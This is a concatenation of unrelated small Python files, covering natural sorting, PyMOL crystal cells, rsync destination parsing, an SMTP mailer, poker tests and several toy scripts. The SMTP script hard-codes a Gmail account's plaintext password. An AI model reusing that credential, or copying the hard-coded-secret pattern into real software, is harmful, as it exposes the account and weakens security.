Strings that lead with a number get an empty string at the front of the tuple.
This is designed to get around the "unorderable types" issue of Python3.
>>> natsort_key('15a')
({u}'', 15.0, {u}'a')
You can give bare numbers, too.
>>> natsort_key(10)
({u}'', 10)
If you have a case where one of your string has two numbers in a row
(only possible with "5+5" or "5-5" and signed=True to my knowledge), you
can turn on the "py3_safe" option to try to add a "" between sets of two
numbers.
>>> natsort_key('43h7+3', py3_safe=True)
({u}'', 43.0, {u}'h', 7.0, {u}'', 3.0)
"""
# If we are dealing with non-strings, return now
if not isinstance(s, py23_basestring):
if hasattr(s, '__getitem__'):
return tuple(natsort_key(x) for x in s)
else:
return ('', s,)
# Convert to the proper tuple and return
inp_options = (number_type, signed, exp)
try:
args = (s,) + regex_and_num_function_chooser[inp_options] + (py3_safe,)
except KeyError:
# Report errors properly
if number_type not in (float, int) and number_type is not None:
raise ValueError("natsort_key: 'number_type' "
"parameter '{0}' invalid".format(py23_str(number_type)))
elif signed not in (True, False):
raise ValueError("natsort_key: 'signed' "
"parameter '{0}' invalid".format(py23_str(signed)))
elif exp not in (True, False):
raise ValueError("natsort_key: 'exp' "
"parameter '{0}' invalid".format(py23_str(exp)))
else:
return tuple(_number_finder(*args))
@u_format
def natsorted(seq, key=lambda x: x, number_type=float, signed=True, exp=True):
"""\
Sorts a sequence naturally (alphabetically and numerically),
not lexicographically.
seq (iterable)
The sequence to sort.
key (function)
A key used to determine how to sort each element of the sequence.
number_type (None, float, int)
The types of number to sort on: float searches for floating point
numbers, int searches for integers, and None searches for digits
(like integers but does not take into account negative sign).
None is a shortcut for number_type = int and signed = False.
signed (True, False)
By default a '+' or '-' before a number is taken to be the sign
of the number. If signed is False, any '+' or '-' will not be
considered to be part of the number, but as part part of the string.
exp (True, False)
This option only applies to number_type = float. If exp = True,
a string like "3.5e5" will be interpreted as 350000, i.e. the
exponential part is considered to be part of the number.
If exp = False, "3.5e5" is interpreted as (3.5, "e", 5).
The default behavior is exp = True.
returns
The sorted sequence.
Use natsorted just like the builtin sorted
>>> a = ['num3', 'num5', 'num2']
>>> natsorted(a)
[{u}'num2', {u}'num3', {u}'num5']
"""
try:
return sorted(seq, key=lambda x: natsort_key(key(x),
number_type=number_type,
signed=signed, exp=exp))
except TypeError as e:
# In the event of an unresolved "unorderable types" error
# attempt to sort again, being careful to prevent this error.
if 'unorderable types' in str(e):
return sorted(seq, key=lambda x: natsort_key(key(x),
number_type=number_type,
signed=signed, exp=exp,
py3_safe=True))
else:
# Re-raise if the problem was not "unorderable types"
raise
@u_format
def versorted(seq, key=lambda x: x):
"""\
Convenience function to sort version numbers. This is a wrapper
around natsorted(seq, number_type=None).
seq (iterable)
The sequence to sort.
key (function)
A key used to determine how to sort each element of the sequence.
returns
The sorted sequence.
Use versorted just like the builtin sorted
>>> a = ['num4.0.2', 'num3.4.1', 'num3.4.2']
>>> versorted(a)
[{u}'num3.4.1', {u}'num3.4.2', {u}'num4.0.2']
"""
return natsorted(seq, key=key, number_type=None)
@u_format
def index_natsorted(seq, key=lambda x: x, number_type=float, signed=True, exp=True):
"""\
Sorts a sequence naturally, but returns a list of sorted the
indexes and not the sorted list.
seq (iterable)
The sequence to sort.
key (function)
A key used to determine how to sort each element of the sequence.
number_type (None, float, int)
The types of number to sort on: float searches for floating point
numbers, int searches for integers, and None searches for digits
(like integers but does not take into account negative sign).
None is a shortcut for number_type = int and signed = False.
signed (True, False)
By default a '+' or '-' before a number is taken to be the sign
of the number. If signed is False, any '+' or '-' will not be
considered to be part of the number, but as part part of the string.
exp (True, False)
This option only applies to number_type = float. If exp = True,
a string like "3.5e5" will be interpreted as 350000, i.e. the
exponential part is considered to be part of the number.
If exp = False, "3.5e5" is interpreted as (3.5, "e", 5).
The default behavior is exp = True.
returns
The ordered indexes of the sequence.
Use index_natsorted if you want to sort multiple lists by the sort order of
one list:
>>> from natsort import index_natsorted
>>> a = ['num3', 'num5', 'num2']
>>> b = ['foo', 'bar', 'baz']
>>> index = index_natsorted(a)
>>> index
[2, 0, 1]
>>> # Sort both lists by the sort order of a
>>> [a[i] for i in index]
[{u}'num2', {u}'num3', {u}'num5']
>>> [b[i] for i in index]
[{u}'baz', {u}'foo', {u}'bar']
"""
item1 = itemgetter(1)
# Pair the index and sequence together, then sort by element
index_seq_pair = [[x, key(y)] for x, y in py23_zip(py23_range(len(seq)), seq)]
try:
index_seq_pair.sort(key=lambda x: natsort_key(item1(x),
number_type=number_type,
signed=signed, exp=exp))
except TypeError as e:
# In the event of an unresolved "unorderable types" error
# attempt to sort again, being careful to prevent this error.
if 'unorderable types' in str(e):
index_seq_pair.sort(key=lambda x: natsort_key(item1(x),
number_type=number_type,
signed=signed, exp=exp,
py3_safe=True))
else:
# Re-raise if the problem was not "unorderable types"
raise
return [x[0] for x in index_seq_pair]
@u_format
def index_versorted(seq, key=lambda x: x):
"""\
Convenience function to sort version numbers but return the
indexes of how the sequence would be sorted.
This is a wrapper around index_natsorted(seq, number_type=None).
seq (iterable)
The sequence to sort.
key (function)
A key used to determine how to sort each element of the sequence.
returns
The ordered indexes of the sequence.
Use index_versorted just like the builtin sorted
>>> a = ['num4.0.2', 'num3.4.1', 'num3.4.2']
>>> index_versorted(a)
[1, 2, 0]
"""
return index_natsorted(seq, key=key, number_type=None)
|
total_cost = int(input("Total cost:"))
received = int(input("Money received:"))
print("You will get {} doller back".format(received - total_cost))
|
import unittest
from poker.card import Card
from poker.validators import StraightFlushValidator
class TestStraightFlushValidator(unittest.TestCase):
def test_straigh_flush_is_not_valid(self):
'''
straight flush occurs when
all rank are sequential and
suite is same
'''
cards = [
Card(rank = "3", suite = "clubs"),
Card(rank = "4", suite = "hearts"),
Card(rank = "5", suite = "hearts"),
Card(rank = "6", suite = "hearts"),
Card(rank = "7", suite = "hearts"),
Card(rank = "8", suite = "clubs"),
Card(rank = "King", suite = "hearts")
]
validator = StraightFlushValidator(cards = cards)
self.assertEqual(
validator.is_valid(),
False
)
def test_straigh_flush_is_not_valid(self):
'''
straight flush occurs when
all rank are sequential and
suite is same
'''
cards = [
Card(rank = "4", suite = "hearts"),
Card(rank = "5", suite = "hearts"),
Card(rank = "6", suite = "hearts"),
Card(rank = "7", suite = "hearts"),
Card(rank = "8", suite = "hearts"),
Card(rank = "King", suite = "hearts")
]
validator = StraightFlushValidator(cards = cards)
self.assertEqual(
validator.is_valid(),
True
)
def test_valid_cards(self):
cards = [
Card(rank = "4", suite = "hearts"),
Card(rank = "5", suite = "hearts"),
Card(rank = "6", suite = "hearts"),
Card(rank = "7", suite = "hearts"),
Card(rank = "8", suite = "hearts"),
Card(rank = "King", suite = "hearts")
]
validator = StraightFlushValidator(cards = cards)
self.assertEqual(
validator.valid_cards(),
[
Card(rank = "4", suite = "hearts"),
Card(rank = "5", suite = "hearts"),
Card(rank = "6", suite = "hearts"),
Card(rank = "7", suite = "hearts"),
Card(rank = "8", suite = "hearts"),
]
) |
# Decision Tree Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeRegressor, plot_tree
from sklearn.metrics import r2_score
# Importing the dataset
df = pd.read_csv('https://query.data.world/s/rjfb64km2adpnnrglujstxylw3wanb',nrows=5000)
#extracting the required data
data=df[['experience_total','salary']]
#checking for missing data
print("The missing data \n {} ".format(data.isnull().sum()))
#droping the rows with missing data
data=data.dropna( how='any')
#Splitting X and Y sets
X=data.iloc[:,0:1].values
Y=data.iloc[:,1:2].values
#splitting data into train and test sets
X_train,X_test,Y_train,Y_test=train_test_split(X,Y, test_size=0.3, random_state=0)
#applying DT regressor
dt=DecisionTreeRegressor(max_depth=4,random_state = 0)
dt.fit(X_train,Y_train)
#plotting the training results
X_grid = np.arange(min(X_train), max(X_train), 0.01)
X_grid = X_grid.reshape((len(X_grid), 1))
plt.scatter(X_train,Y_train, color='red')
plt.plot(X_grid,dt.predict(X_grid),color='blue')
plt.title('DT')
plt.xlabel('Experience')
plt.ylabel('Salary')
plt.show()
#accuracy
print("The accuracy of the model is : ",r2_score(Y_test, dt.predict(X_test)))
#plotting the tree structure
plot_tree(dt,filled=True) |
'''
(c) 2010 Thomas Holder
PyMOL python script (load with `run supercell.py`)
Usage: See "help supercell" and "help symexpcell"
'''
from pymol import cmd, cgo, xray
from math import cos, sin, radians, sqrt
import numpy
def cellbasis(angles, edges):
'''
For the unit cell with given angles and edge lengths calculate the basis
transformation (vectors) as columns of a 4x4 numpy.array
'''
rad = [radians(i) for i in angles]
basis = numpy.identity(4)
basis[0][1] = cos(rad[2])
basis[1][1] = sin(rad[2])
basis[0][2] = cos(rad[1])
basis[1][2] = (cos(rad[0]) - basis[0][1]*basis[0][2])/basis[1][1]
basis[2][2] = sqrt(1 - basis[0][2]**2 - basis[1][2]**2)
edges.append(1.0)
return basis * edges # numpy.array multiplication!
def supercell(a=1, b=1, c=1, object=None, color='blue', name='supercell', withmates=1,prefix="m",center=0,transformation=None,cutoff=None):
'''
DESCRIPTION
Draw a supercell, as requested by Nicolas Bock on the pymol-users
mailing list (Subject: [PyMOL] feature request: supercell construction
Date: 04/12/2010 10:12:17 PM (Mon, 12 Apr 2010 14:12:17 -0600))
USAGE
supercell a, b, c [, object [, color [, name [, withmates]]]]
ARGUMENTS
a, b, c = integer: repeat cell in x,y,z direction a,b,c times
{default: 1,1,1}
object = string: name of object to take cell definition from
color = string: color of cell {default: blue}
name = string: name of the cgo object to create {default: supercell}
withmates = bool: also create symmetry mates in displayed cells
{default: 1}
prefix = string: prefix for the symmetry mates {default: m}
center = boolean: If 1, indicates that the lattice should be centered on the
origin, as opposed to having the corner at the origin cell. {default: 0}
transformation = list: a 16-element list giving the 4x4 transformation
matrix, as described in get_object_matrix() {default: identity matrix}
cutoff = int: restrict symmetry mates to within cutoff angstroms of the origin.
Use 0 to generate all symmetry mates. {default: 0}
SEE ALSO
show cell
cmd
'''
if object is None:
object = cmd.get_object_list()[0]
withmates = int(withmates)
sym = cmd.get_symmetry(object)
if sym is None:
print("No symmetry operators found")
return
cell_edges = sym[0:3]
cell_angles = sym[3:6]
basis = cellbasis(cell_angles, cell_edges)
if transformation is not None:
transmat = transformation_to_numpy(transformation)
assert isinstance(basis, numpy.ndarray)
ts = list()
a = int(a)
b = int(b)
c = int(c)
if int(center) == 0:
astart = 0
bstart = 0
cstart = 0
else:
#TODO Maybe would be more useful to center at the asymmetric unit?
# For now, center on the origin cell.
astart = (1-a)/2
bstart = (1-b)/2
cstart = (1-c)/2
for i in range( astart,astart+a ):
for j in range( bstart,bstart+b ):
for k in range( cstart,cstart+c ):
ts.append([i,j,k])
obj = [
cgo.BEGIN,
cgo.LINES,
cgo.COLOR,
]
obj.extend(cmd.get_color_tuple(color))
for t in ts:
# draw bounding box around cell t
shift = basis[0:3,0:3] * t
shift = shift[:,0] + shift[:,1] + shift[:,2]
for i in range(3):
# vi is direction of the edges to draw
vi = basis[0:3,i]
# vj are starting points for the four edges in that direction
vj = [
numpy.array([0.,0.,0.]),
basis[0:3,(i+1)%3],
basis[0:3,(i+2)%3],
basis[0:3,(i+1)%3] + basis[0:3,(i+2)%3]
]
for j in range(4):
start = shift + vj[j]
end = start + vi
if transformation is not None:
start = numpy.dot(transmat, numpy.append(start,1))[:3]
end = numpy.dot(transmat, numpy.append(end ,1))[:3]
obj.append(cgo.VERTEX)
obj.extend(start.tolist())
obj.append(cgo.VERTEX)
obj.extend(end.tolist())
if withmates:
symexpcell('%s%d%d%d_' % (prefix,t[0]-astart,t[1]-bstart,t[2]-cstart), object, *t,transformation=transformation,cutoff=cutoff)
obj.append(cgo.END)
cmd.delete(name)
cmd.load_cgo(obj, name)
def symexpcell(prefix='mate', object=None, a=0, b=0, c=0,transformation=None,cutoff=None):
'''
DESCRIPTION
Creates all symmetry-related objects for the specified object that
occur with their bounding box center within the unit cell.
USAGE
symexpcell prefix, object, [a, b, c]
ARGUMENTS
prefix = string: prefix of new objects
object = string: object for which to create symmetry mates
a, b, c = integer: create neighboring cell {default: 0,0,0}
transformation = list: list of 16 floats giving the transformation matrix
to apply to the generated symmetry mates {default: identity matrix}
cutoff = int: restrict symmetry mates to within cutoff angstroms of the origin.
Use 0 to generate all symmetry mates. {default: 0}
SEE ALSO
symexp, http://www.pymolwiki.org/index.php/SuperSym
'''
#print "symexpcell %s,%s,%d,%d,%d,%s"%(prefix,object,int(a),int(b),int(c),transformation)
if object is None:
object = cmd.get_object_list()[0]
if cutoff is not None:
cutoff = int(cutoff)
if cutoff <= 0: cutoff = None
sym = cmd.get_symmetry(object)
cell_edges = sym[0:3]
cell_angles = sym[3:6]
spacegroup = sym[6]
basis = cellbasis(cell_angles, cell_edges)
extent = cmd.get_extent(object)
center = sum(numpy.array(extent)) * 0.5
center = numpy.append(center,1.0).reshape(4,1)
center_cell = numpy.linalg.inv(basis) * center
extra_shift = numpy.array([[float(i)] for i in (a,b,c)])
origin = numpy.array([[0,0,0,1]]).T
if transformation is not None:
transmat = transformation_to_numpy(transformation)
#print "%s\n*\n%s\n=\n%s\n" % (origin,transmat,
# numpy.dot(numpy.linalg.inv(transmat),origin) )
origin = numpy.dot(numpy.linalg.inv(transmat),origin)
i = 0
matrices = xray.sg_sym_to_mat_list(spacegroup)
for mat in matrices:
i += 1
mat = numpy.array(mat)
shift = numpy.floor(numpy.dot(mat, center_cell))
mat[0:3,3] -= shift[0:3,0]
mat[0:3,3] += extra_shift[0:3,0]
mat = numpy.dot(numpy.dot(basis, mat), numpy.linalg.inv(basis) )
mat_list = list(mat.flat)
new_center = numpy.dot(mat,center)
#print "%s\n* (%d)\n%s\n=\n%s\n" % (center,i,mat, new_center)
if cutoff is not None:
dist = new_center - origin
dist = numpy.dot(dist.T,dist)
if dist > cutoff**2:
#print "Skipping %d%d%d_%d at distance %f" % (a,b,c,i,sqrt(dist))
continue
name = '%s%d' % (prefix, i)
cmd.create(name, object)
cmd.transform_object(name, mat_list)
# Apply extra transformation afterwards
if transformation is not None:
cmd.transform_object(name, transformation)
cmd.color(i+1, name)
cmd.extend('symexpcell', symexpcell)
cmd.extend('supercell', supercell)
def transformation_to_numpy(transformation):
if len(transformation) != 16:
print "Invalid transformation. Expect 16-element transformation matrix, found %d."%len(transformation)
return None
mat = numpy.array(transformation).reshape(4,4)
return mat
def numpy_to_transformation(mat):
return mat.reshape(-1).tolist()
# tab-completion of arguments
cmd.auto_arg[3]['supercell'] = [ cmd.object_sc, 'object', '']
# vim:ts=4 sw=4 noet
|
import smtplib, ssl, sys
smtp_server = "smtp.gmail.com"
port = 587 # For SSL
sender_email = "wifiologyproject@gmail.com"
password = "Wifi1234-"
receiver_email = "wifiologyproject@gmail.com"
message = """\
Subject: Hi there
This message is sent from Python."""
# Create a secure SSL context
context = ssl.create_default_context()
with smtplib.SMTP(smtp_server, port) as server:
server.ehlo() # Can be omitted
server.starttls()
server.ehlo() # Can be omitted
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, message) |
import random
import functools
import os
import termcolor
class FileAdapter():
def __init__(self, file_name):
self.file_name = file_name
@functools.lru_cache(maxsize=1)
def readlines(self):
lines = list()
with open(self.file_name, "r") as f:
lines = self._save_readlines(f)
return lines
def _save_readlines(self, file):
try:
return file.readlines()
except IOError as e:
print(termcolor.colored(f"Error while reading from {self.file_name}: {str(e)}", "magenta"))
return list()
class FilesInputStream():
def __init__(self):
self.file_adapters = list()
def add_file(self, file_name):
if(not os.path.exists(file_name)):
print(termcolor.colored(f"WARNING: Couldnt open {file_name}. File does not exists!", "magenta")) #TODO:Logging
self.file_adapters.append(FileAdapter(file_name))
def get_lines(self, limit=None):
line_counter = 0
for file_adapter in self.file_adapters:
for line in file_adapter.readlines():
if(limit is not None and line_counter>=limit):
break
line_counter+=1
yield line.replace('\n', '').strip()
def get_randomized_lines(self, limit=None):
lines = list(self.get_lines(limit=limit))
random.shuffle(lines)
for line in lines:
yield line
def get_random_line(self):
lines = list(self.get_lines())
index = random.randint(0, len(lines)-1)
return lines[index]
@functools.cached_property
def lines_count(self):
return len(list(self.get_lines())) |
import time
def timeofday():
"""Prints current time of day in 24 hour format,
along with days since 1st Jan 1970.
"""
t = time.time() #time in seconds since 1st Jan 1970
seconds = str(int(t%60))
minutes = str(int((t//60)%60))
hours = str(int((t//3600)%24))
days = str(int(t//(3600*24)))
seconds = zeropad(seconds)
minutes = zeropad(minutes)
hours = zeropad(hours)
s = '(days since epoch ='+days+', current time = '+hours+':'+minutes+':'+seconds+')'
print(s)
def zeropad(s):
"""Pads a one digit integer presented as a string with a zero in the front.
Leaves other integer as they are."""
if len(s) == 1:
s = '0'+s
return s
#Testing zeropad
print('8')
print(len('8'))
print(zeropad('24'))
print(zeropad('8'))
timeofday()
|
# -*- coding:utf-8 -*-
class Solution:
def VerifySquenceOfBST(self, sequence):
# write code here
# if sequence == []:
# return False # 这里应该为True 因为空树也能是二叉搜索树
#
# rootNum = sequence[-1]
# del sequence[-1] # 这里将根节点删除
#
# index = None
# for i in range(len(sequence)):
# if index == None and sequence[i] > rootNum:
# index = i
# if index != None and sequence[i] < rootNum:
# return False
#
# if sequence[:index] == []:
# leftRet = True
# else:
# leftRet = self.VerifySquenceOfBST(sequence[:index])
#
# if sequence[index:] == []:
# rightRet = True
# else:
# rightRet = self.VerifySquenceOfBST(sequence[index:])
#
# return rightRet and leftRet
if not sequence:
return False
root_i = len(sequence)-1
while root_i:
i = 0
while(sequence[i] < sequence[root_i]):
i += 1
while(sequence[i] > sequence[root_i]):
i += 1
if i != root_i:
return False
root_i -= 1 #这里的作用是退出while循环
return True
if __name__ == '__main__':
s = Solution()
print(s.VerifySquenceOfBST([4,8,6,12,16,14,10])) |
#!/usr/bin/env python3
"""
Rotate Matrix: Given an image represented by an NxN matrix, where each pixel in
the image is 4 bytes, write a method to rotate the image by 90 degrees. Can you
do this in place?
"""
# Check if the provided matrix is 4Nx4N.
def is_4n_x_4n(matrix):
n = len(matrix)
if n == 0 or n % 4 != 0:
return False
for i in range(n):
if len(matrix[i]) != n:
return False
return True
# Time complexity: O(n^2).
# Space complexity: O(n).
def rotate_matrix(matrix):
if not is_4n_x_4n(matrix):
return None
n = len(matrix)
new_matrix = [[0 for j in range(n)] for i in range(n)]
for i in range(n):
for j in range(n):
new_matrix[i][j] = matrix[n-1-j][i]
return new_matrix
# Time complexity: O(n^2).
# Space complexity: O(1).
def rotate_matrix_in_place(matrix):
if not is_4n_x_4n(matrix):
return False
n = len(matrix)
for layer in range(int(n/2)):
first = layer
last = n - 1 - layer
for i in range(first, last):
offset = i - first
# Save top.
top = matrix[first][i]
# left -> top.
matrix[first][i] = matrix[last-offset][first]
# bottom -> left.
matrix[last-offset][first] = matrix[last][last-offset]
# right -> bottom.
matrix[last][last-offset] = matrix[i][last]
# top -> right.
matrix[i][last] = top
return True
|
import turtle
import random
turtle.mode("logo")
a = random.randint(3,18)
turtle.pensize(a)
turtle.pencolor("orange")
turtle.right(90)
turtle.forward(100)
turtle.right(120)
turtle.forward(100)
turtle.right(120)
turtle.forward(100)
turtle.right(120)
turtle.pu()
turtle.goto(0,-58)
turtle.pd()
turtle.pencolor("blue")
turtle.forward(100)
turtle.left(120)
turtle.forward(100)
turtle.left(120)
turtle.forward(100)
turtle.left(120)
turtle.done()
|
# rsync-system-backup: Linux system backups powered by rsync.
#
# Author: Peter Odding <peter@peterodding.com>
# Last Change: May 4, 2018
# URL: https://github.com/xolox/python-rsync-system-backup
"""Parsing of rsync destination syntax (and then some)."""
# Standard library modules.
import logging
import os
import re
# External dependencies.
from humanfriendly import compact
from property_manager import (
PropertyManager,
mutable_property,
required_property,
set_property,
)
# Modules included in our package.
from rsync_system_backup.exceptions import (
InvalidDestinationError,
ParentDirectoryUnavailable,
)
RSYNCD_PORT = 873
"""
The default port of the `rsync daemon`_ (an integer).
.. _rsync daemon: https://manpages.debian.org/rsyncd.conf
"""
LOCAL_DESTINATION = re.compile('^(?P<directory>.+)$')
"""
A compiled regular expression pattern to parse local destinations,
used as a fall back because it matches any nonempty string.
"""
SSH_DESTINATION = re.compile('''
^ ( (?P<username> [^@]+ ) @ )? # optional username
(?P<hostname> [^:]+ ) : # mandatory host name
(?P<directory> .* ) # optional pathname
''', re.VERBOSE)
"""
A compiled regular expression pattern to parse remote destinations
of the form ``[USER@]HOST:DEST`` (using an SSH connection).
"""
SIMPLE_DAEMON_DESTINATION = re.compile('''
^ ( (?P<username> [^@]+ ) @ )? # optional username
(?P<hostname> [^:]+ ) :: # mandatory host name
(?P<module> [^/]+ ) # mandatory module name
( / (?P<directory> .* ) )? $ # optional pathname (without leading slash)
''', re.VERBOSE)
"""
A compiled regular expression pattern to parse remote destinations of the
form ``[USER@]HOST::MODULE[/DIRECTORY]`` (using an rsync daemon connection).
"""
ADVANCED_DAEMON_DESTINATION = re.compile('''
^ rsync:// # static prefix
( (?P<username>[^@]+) @ )? # optional username
(?P<hostname> [^:/]+ ) # mandatory host name
( : (?P<port_number> \d+ ) )? # optional port number
/ (?P<module> [^/]+ ) # mandatory module name
( / (?P<directory> .* ) )? $ # optional pathname (without leading slash)
''', re.VERBOSE)
"""
A compiled regular expression pattern to parse remote destinations of the form
``rsync://[USER@]HOST[:PORT]/MODULE[/DIRECTORY]`` (using an rsync daemon
connection).
"""
DESTINATION_PATTERNS = [
ADVANCED_DAEMON_DESTINATION,
SIMPLE_DAEMON_DESTINATION,
SSH_DESTINATION,
LOCAL_DESTINATION,
]
"""
A list of compiled regular expression patterns to match destination
expressions. The patterns are ordered by decreasing specificity.
"""
# Public identifiers that require documentation.
__all__ = (
'logger',
'RSYNCD_PORT',
'LOCAL_DESTINATION',
'SSH_DESTINATION',
'SIMPLE_DAEMON_DESTINATION',
'ADVANCED_DAEMON_DESTINATION',
'DESTINATION_PATTERNS',
'Destination',
)
# Initialize a logger for this module.
logger = logging.getLogger(__name__)
class Destination(PropertyManager):
"""
The :class:`Destination` class represents a location where backups are stored.
The :attr:`expression` property is a required property whose value is
parsed to populate the values of the :attr:`username`, :attr:`hostname`,
:attr:`port_number`, :attr:`module` and :attr:`directory` properties.
When you read the value of the :attr:`expression` property you get back a
computed value based on the values of the previously mentioned properties.
This makes it possible to manipulate the destination before passing it on
to rsync.
"""
@required_property
def expression(self):
"""
The destination in rsync's command line syntax (a string).
:raises: :exc:`.InvalidDestinationError` when you try to set
this property to a value that cannot be parsed.
"""
if not (self.hostname or self.directory):
# This is a bit tricky: Returning None here ensures that a
# TypeError will be raised when a Destination object is
# created without specifying a value for `expression'.
return None
value = 'rsync://' if self.module else ''
if self.hostname:
if self.username:
value += self.username + '@'
value += self.hostname
if self.module:
if self.port_number:
value += ':%s' % self.port_number
value += '/' + self.module
else:
value += ':'
if self.directory:
value += self.directory
return value
@expression.setter
def expression(self, value):
"""Automatically parse expression strings."""
for pattern in DESTINATION_PATTERNS:
match = pattern.match(value)
if match:
captures = match.groupdict()
non_empty = dict((n, c) for n, c in captures.items() if c)
self.set_properties(**non_empty)
break
else:
msg = "Failed to parse expression! (%s)"
raise InvalidDestinationError(msg % value)
@mutable_property
def directory(self):
"""The pathname of the directory where the backup should be written (a string)."""
return ''
@mutable_property
def hostname(self):
"""The host name or IP address of a remote system (a string)."""
return ''
@mutable_property
def module(self):
"""The name of a module exported by an `rsync daemon`_ (a string)."""
return ''
@mutable_property
def parent_directory(self):
"""
The pathname of the parent directory of the backup directory (a string).
:raises: :exc:`.ParentDirectoryUnavailable` when the parent directory
can't be determined because :attr:`directory` is empty or '/'.
"""
directory = os.path.dirname(self.directory.rstrip('/'))
if not directory:
raise ParentDirectoryUnavailable(compact("""
Failed to determine the parent directory of the destination
directory! This makes it impossible to create and rotate
snapshots for the destination {dest}.
""", dest=self.expression))
return directory
@mutable_property
def port_number(self):
"""
The port number of a remote `rsync daemon`_ (a number).
When :attr:`ssh_tunnel` is set the value of :attr:`port_number`
defaults to :attr:`executor.ssh.client.SecureTunnel.local_port`,
otherwise it defaults to :data:`RSYNCD_PORT`.
"""
return self.ssh_tunnel.local_port if self.ssh_tunnel is not None else RSYNCD_PORT
@port_number.setter
def port_number(self, value):
"""Automatically coerce port numbers to integers."""
set_property(self, 'port_number', int(value))
@mutable_property
def ssh_tunnel(self):
"""A :class:`~executor.ssh.client.SecureTunnel` object or :data:`None` (defaults to :data:`None`)."""
@mutable_property
def username(self):
"""The username for connecting to a remote system (a string)."""
return ''
def __enter__(self):
"""Automatically open :attr:`ssh_tunnel` when required."""
if self.ssh_tunnel:
self.ssh_tunnel.__enter__()
return self
def __exit__(self, exc_type=None, exc_value=None, traceback=None):
"""Automatically close :attr:`ssh_tunnel` when required"""
if self.ssh_tunnel:
self.ssh_tunnel.__exit__(exc_type, exc_value, traceback)
|
from management import management_pb2
from operator import itemgetter
class GraphElementAdder:
SINGLE = False
ALL = False
name = None
ELEMENT = None
element_to_update = None
supported_parameters = ["properties", "readOnly", "partitioned", "direction", "multiplicity", "directed"]
def __init__(self, **kwargs):
self.properties = None
self.readOnly = None
self.partitioned = None
self.directed = None
self.direction = None
self.multiplicity = None
for property_name, property_value in kwargs.items():
setattr(self, property_name, property_value)
def __are_valid_parameters_passed__(self, **kwargs):
valid_params_passed = all([x in self.supported_parameters for x in kwargs.keys()])
if not valid_params_passed:
invalid_param_idx = [i for i, x in enumerate([x in self.supported_parameters
for x in kwargs.keys()]) if x is False]
invalid_params = itemgetter(*invalid_param_idx)(kwargs.keys())
raise LookupError(f"Invalid parameter passed. The passed parameter {invalid_params} "
f"is not part of supported parameter list ${self.supported_parameters}")
def set_element(self, element):
"""
Args:
element (GraphElement):
Returns:
"""
self.ELEMENT = element
if isinstance(element, management_pb2.VertexLabel):
self.element_to_update = "VertexLabel"
elif isinstance(element, management_pb2.EdgeLabel):
self.element_to_update = "EdgeLabel"
else:
raise ValueError("Invalid element accessed in setter() method. Expecting class to be "
"EdgeLabel or VertexLabel for " + str(type(element)))
def __build_element__(self):
for property_name in self.supported_parameters:
value = getattr(self, property_name, None)
if value is not None:
if property_name == "properties":
if self.element_to_update == "VertexLabel":
if isinstance(value, str):
vp = [management_pb2.VertexProperty(name=value)]
else:
vp = []
for prop in value:
vp.append(management_pb2.VertexProperty(name=prop))
self.ELEMENT.properties.extend(vp)
else:
if isinstance(value, str):
ep = [management_pb2.EdgeProperty(name=value)]
else:
ep = []
for prop in value:
ep.append(management_pb2.EdgeProperty(name=prop))
self.ELEMENT.properties.extend(ep)
elif property_name == "multiplicity":
self.ELEMENT.multiplicity = management_pb2.EdgeLabel.Multiplicity.Value(value)
elif property_name == "directed":
directed = value if isinstance(value, bool) else (True if value.lower() == "true" else False)
# print(value, directed)
# exit(-1)
if directed:
self.ELEMENT.directed = management_pb2.EdgeLabel.Directed.Value("directed_edge")
else:
self.ELEMENT.directed = management_pb2.EdgeLabel.Directed.Value("undirected_edge")
elif property_name == "direction":
raise NotImplementedError("Not implemented custom direction for Edges PUT request")
elif property_name == "readOnly":
self.ELEMENT.readOnly = value if isinstance(value, bool) else (True if value.lower() == "true" else False)
elif property_name == "partitioned":
self.ELEMENT.partitioned = value if isinstance(value, bool) else (True if value.lower() == "true" else False)
else:
raise ValueError(f"Expecting the keys to be either of {self.supported_parameters} "
f"but got {property_name}")
return self
def get_element(self):
self.__build_element__()
return self.ELEMENT
|
"""
Test running
"""
from django.core.cache import cache
from django.test import SimpleTestCase
from cache_results import cache_results
class CacheResultsTest(SimpleTestCase):
def test_decorator(self):
nonlocal_dict = {}
def get_cache_key(arg1):
return 'foo.{}'.format(arg1)
@cache_results(key_function=get_cache_key, alias='default')
def example(arg1):
nonlocal_dict.setdefault(arg1, 0)
counter = nonlocal_dict[arg1] + 1
nonlocal_dict[arg1] = counter
return "dummy{}".format(counter)
# First call, enter cache
example(1)
self.assertEqual(nonlocal_dict[1], 1)
self.assertEqual(cache.get(get_cache_key(1)), "dummy1")
# Calling again should be cached
example(1)
example(1)
self.assertEqual(nonlocal_dict[1], 1) # still called once
# Bypass calls the original function
example.bypass_cache(1)
example.bypass_cache(1)
self.assertEqual(nonlocal_dict[1], 3) # now called trice
# Refresh updates and recaches
self.assertEqual(cache.get(get_cache_key(1)), "dummy1")
example.refresh_cache(1)
self.assertEqual(nonlocal_dict[1], 4) # called 4 times
self.assertEqual(cache.get(get_cache_key(1)), "dummy4")
# And allow removal
example.clear_cache(1)
self.assertIsNone(cache.get(get_cache_key(1)))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from recap import recap
def run():
recap.main(sys.argv[1:])
if __name__ == '__main__':
run()
|
#Console Clearing method
def clear_console():
"""This is used to clear console, specifically designed for PyCharm IDE users"""
import pyautogui
#print(pyautogui.position())
pyautogui.moveTo(520,580)
pyautogui.click()
pyautogui.hotkey('alt','l')
clear_console()
|
import logging
import zipfile
import click
from lxml import etree
@click.group()
@click.argument('genofile', type=click.File('r+b'))
@click.pass_context
def cli(ctx, genofile):
logging.basicConfig()
if genofile.seekable and zipfile.is_zipfile(genofile):
with zipfile.ZipFile(genofile, 'r') as zf:
with zf.open('Data.xml', 'r') as xml:
geno = etree.parse(xml)
else:
geno = etree.parse(genofile)
ctx.obj = {'tree': geno}
@cli.resultcallback()
@click.pass_context
def done(ctx, changed, genofile):
geno = ctx.obj['tree']
if not genofile.seekable:
geno.write(genofile)
else:
genofile.seek(0)
genofile.truncate(0)
with zipfile.ZipFile(genofile, 'w') as zf:
with zf.open('Data.xml', 'w') as xml:
geno.write(xml)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 22 05:52:20 2021
@author: profjahier
"""
import tkinter as tk
import tkinter.messagebox as msgb # boîte de dialogue
def verification():
if mot_de_passe.get() == 'python':
# le mot de passe est bon :
